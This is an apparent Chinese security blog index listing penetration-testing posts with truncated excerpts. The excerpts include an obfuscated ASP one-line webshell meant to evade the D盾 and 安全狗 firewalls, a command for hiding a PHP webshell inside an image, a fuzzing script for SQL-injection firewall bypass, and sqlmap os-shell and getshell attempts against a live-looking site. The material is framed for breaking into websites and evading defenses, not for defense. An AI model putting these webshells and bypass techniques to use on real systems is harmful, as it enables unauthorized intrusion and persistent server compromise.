过D盾过安全狗asp一句话

小俊 | 渗透测试 | 2019-07-29
  eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107")) Function fun(Str):     Str = Split(Str,"%") &nb [阅读全文]
ė1396次浏览 60条评论 0 过D盾asp一句话

制作一句话图片马

小俊 | 渗透测试 | 2019-05-03
先cd进在图片和一句话木马里面的文件夹 假设选择我的图片是:1.jpg 一句话是:2.php 命令:copy 1.jpg/a+2.php/b   [阅读全文]
ė752次浏览 60条评论 0

Fuzz方法注入绕过安全狗

小俊 | 渗透测试 | 2019-02-12
以Sqli lab的第六关为测试环境  成功Bypass 注释里的payload 可以成功跑出带表名列名的信息 #encoding = utf8 import requests from queue import Queue import threading fuzz_zs = ['/*','*/','/*!','*','=', [阅读全文]
ė830次浏览 60条评论 0

一次蛋疼的Sqlmap --os-shell

小俊 | 渗透测试 | 2019-02-06
第一天 找到一个注入点 站点是aspx 跑着跑着。跑出了账户密码 但是没后台 尝试sqlmap.py -u "http://www.***com.cn/news_cont.aspx?id=*0" --os-shell sqlmap自带一句话写不进去。 日什么站,睡 [阅读全文]
ė1435次浏览 60条评论 0

Sqlmao连接Mysql实现Getshell

小俊 | 渗透测试 | 2019-02-05
0x01 首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎. 语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" 或者是"DBMS://DATABASE_FILEPATH"。 [1]dbms:代表所运用的数据库,如咱们这儿是mysql [2]user:对应咱们数据库的用户,如咱们这 [阅读全文]
ė710次浏览 60条评论 0

绕过WAF继续进行SQL注入方法

小俊 | 渗透测试 | 2019-02-02
绕过WAF继续SQL注入常用方法 Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过。WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是啥。     WAF呢,简单说,它是一个Web应用程序防火墙,其功能呢是用于过滤某些 [阅读全文]
ė1529次浏览 60条评论 0

Ɣ回顶部